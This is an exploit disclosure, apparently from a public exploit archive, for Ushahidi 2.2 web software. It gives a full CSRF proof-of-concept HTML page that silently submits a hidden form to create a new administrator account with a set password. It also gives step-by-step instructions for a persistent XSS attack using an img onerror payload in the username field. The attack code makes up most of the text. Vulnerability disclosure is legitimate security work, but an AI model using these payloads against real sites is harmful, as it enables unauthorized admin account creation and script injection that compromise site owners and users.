46 lines
No EOL
1.4 KiB
Text
46 lines
No EOL
1.4 KiB
Text
# Exploit Title: Ushahidi 2.2 Multiple Vulnerabilites
|
|
# Date: 04/12/2012
|
|
# Author: shpendk
|
|
# Software Link: http://download.ushahidi.com/
|
|
# Version: 2.2
|
|
# Tested on: Xampp on Windows
|
|
# Vendor Contact: 03/25/2012
|
|
-> Contacted again: 03/28/2012
|
|
-> No Response yet: 04/11/2012
|
|
-> Full Disclosure: 04/12/2012
|
|
|
|
|
|
|
|
1) CSRF Add Admin PoC:
|
|
|
|
-----------------------------------------------------------------------------------------------------
|
|
<html>
|
|
<body>
|
|
<form action="http://127.0.0.1/admin/users/edit" method="POST">
|
|
<input type="hidden" name="name" value="myname">
|
|
<input type="hidden" name="email" value="shpendk13@gmail.com">
|
|
<input type="hidden" name="role" value="admin">
|
|
<input type="hidden" name="username" value="shpendk">
|
|
<input type="hidden" name="notify" value="1">
|
|
<input type="hidden" name="password" value="letmein">
|
|
<input type="hidden" name="password_again" value="letmein">
|
|
</form>
|
|
<script> document.forms[0].submit(); </script>
|
|
|
|
</body>
|
|
</html>
|
|
|
|
-------------------------------------------------------------------------------------------------------
|
|
|
|
|
|
|
|
2) Persistent XSS
|
|
|
|
------------------------------------------------------------------------------------------------------
|
|
|
|
-> Go to http://127.0.0.1/login
|
|
-> Create New User
|
|
-> Enter username: <img/onerror="alert(123)"src=a>
|
|
-> Login as Admin and go to http://127.0.0.1/admin/users
|
|
|
|
------------------------------------------------------------------------------------------------------ |